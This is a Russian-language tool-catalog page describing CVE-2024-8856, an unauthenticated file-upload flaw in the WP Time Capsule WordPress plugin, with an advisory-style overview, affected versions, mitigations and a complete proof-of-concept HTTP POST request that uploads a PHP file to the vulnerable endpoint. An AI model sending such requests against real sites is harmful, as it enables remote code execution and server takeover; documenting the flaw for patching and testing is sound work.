Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-8856 — Уязвимость произвольной загрузки файлов в плагине WP Time Capsule для WordPress | Kitploit
Инструменты/GitHubGitHub/ubaydev/cve-2024-8856
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHububaydev/cve-2024-8856

CVE-2024-8856

Уязвимость произвольной загрузки файлов в плагине WP Time Capsule для WordPress

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-8856: Уязвимость произвольной загрузки файлов в плагине WP Time Capsule для WordPress

Обзор

CVE-2024-8856 — это уязвимость безопасности, обнаруженная в плагине WP Time Capsule для WordPress, которая позволяет неаутентифицированным пользователям загружать произвольные файлы на сервер. Это может привести к удаленному выполнению кода, если загруженные файлы будут выполнены сервером. Уязвимость возникает из-за недостаточной проверки файлов и может быть использована путем отправки специально оформленных запросов на уязвимую конечную точку.

Затронутые версии

  • Версии плагина WP Time Capsule до 1.22.21 (исправлено в 1.22.22).

Влияние

эта уязвимость позволяет неаутентифицированным пользователям:

  • Загружать вредоносные PHP-скрипты на сервер.
  • Выполнять произвольный код на сервере, что приводит к полной компрометации системы.
  • Потенциально использовать этот доступ для дальнейшей эксплуатации веб-приложения и базовой инфраструктуры.

Подтверждение концепции (PoC)

Ниже приведено подтверждение концепции, демонстрирующее, как использовать уязвимость CVE-2024-8856 путем отправки POST-запроса на уязвимую конечную точку.

Пример запроса

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

Объяснение PoC

  • POST-запрос: Запрос является POST-запросом к пути, где открыта уязвимая функция загрузки.
  • Content-Type: В запросе устанавливается Content-Type как multipart/form-data, что требуется для загрузки файлов.
  • Загрузка файла: Файл указывается в теле с заголовком Content-Disposition. В примере предпринимается попытка загрузить PHP-файл, содержащий <?php phpinfo();, который при выполнении отобразит детали конфигурации PHP.
  • Уязвимая конечная точка: Конечная точка /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php является точкой эксплуатации.

Меры по устранению

Для устранения этой уязвимости:

  • Обновите плагин: Всегда следите за тем, чтобы плагин WP Time Capsule был обновлен до последней версии, предоставленной разработчиком.
  • Ограничения на загрузку файлов: Внедрите ограничения на загрузку файлов на сервере, чтобы разрешать только определенные типы файлов (например, изображения) и запрещать выполнение загруженных файлов.
  • Межсетевой экран веб-приложений (WAF): Используйте межсетевой экран веб-приложений (WAF) для обнаружения и блокировки вредоносных запросов до того, как они достигнут вашего сервера.

Ссылки

CVE-2024-8856 — Национальная база данных уязвимостей

Заключение

CVE-2024-8856 — это серьезная уязвимость, требующая немедленного внимания со стороны администраторов сайтов WordPress, использующих плагин WP Time Capsule. Следует принять надлежащие меры предосторожности для защиты приложения от возможной эксплуатации. Всегда следите за обновлениями в области безопасности и обновлениями плагинов.

Скачать инструмент